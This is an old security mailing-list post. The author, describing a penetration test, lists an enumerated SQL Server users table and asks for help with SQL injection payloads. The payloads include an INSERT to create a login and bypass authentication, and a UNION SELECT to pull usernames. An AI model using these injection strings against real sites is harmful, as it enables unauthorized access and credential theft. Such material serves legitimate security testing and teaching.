sql table data enumeration help please.

From: Gary O'leary-Steele (GaryO@sec-1.com)
Date: Thu May 09 2002 - 12:47:43 PDT

    Hi all,

    I am currently performing a pen test against a web server using IIS with SQL
    integration. There is a user name and password form which I want to bypass
    and enumerate existing usernames and passwords.

    I have discovered the following columns/table data

    tblusers.ID				uniqueidentifier
    tblusers.createdtimestamp	smalldatetime
    tblusers.sessionID		nvarchar
    tblUsers.LastUpdated		smalldatetime
    tblUsers.LastUpdatedIP		nvarchar
    tblUsers.LastUpdatedBy		uniqueidentifier
    tblUsers.CompanyType		nvarchar
    tblUsers.CompanyID		uniqueidentifier
    tblUsers.Password			nvarchar
    tblUsers.UserName			nvarchar
    tblUsers.Title			nvarchar
    tblUsers.Surname			nvarchar
    tblUsers.Forename			nvarchar
    tblUsers.AddressTo		nvarchar
    tblUsers.Appointment		nvarchar
    tblUsers.DirectPhone		nvarchar
    tblUsers.Mobile			nvarchar
    tblUsers.DirectEmail		nvarchar
    tblUsers.DirectFax		nvarchar
    tblUsers.Signature		The text, ntext, and image data types are invalid in
    this subquery or aggregate expression.
    tblUsers.Address1		nvarchar
    tblUsers.Address2		nvarchar
    tblUsers.Address3		nvarchar
    tblUsers.Address4		nvarchar
    tblUsers.Address5		nvarchar
    tblUsers.PostCode		nvarchar
    tblUsers.HomePhone		nvarchar
    tblUsers.UserAccess		bit

    I want to update the table to bypass the auth screen

    I have tried

    -------------
    www.target.comUserName='insert into
    tblusers(createdtimestamp,sessionID,LastUpdated,LastUpdatedIP,LastUpdatedBy,
    CompanyType,CompanyID,Password,username,title,surname,forename,AddressTo,App
    ointment,DirectPhone,Mobile,DirectEmail,directfax,signature,address1,address
    2,postcode,Homephone,UserAccess) values ('Oct 31 2000 8:52PM','7654','Oct 31
    2000
    8:52PM','127.0.0.1','','securitycompany','','test','test','mr','oleary','gar
    y','addrto','appointment','01131234567','07796698919','garyo@sec-1.com',0113
    1234567','sig','123','456','ls287sr','01132297541',1)--

    ------------

    But had no joy

    In an attempt to gain access to data held with the username and password
    fields I have tried

    www.target.com/UserName='Union select 1,1,1,1,1,1,1,1,min(UserName) from
    tblusers where username >'a'--&password=hacker

    but get "Operand type clash: uniqueidentifier is incompatible with int"

    Any help would be greatly appreciated

    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/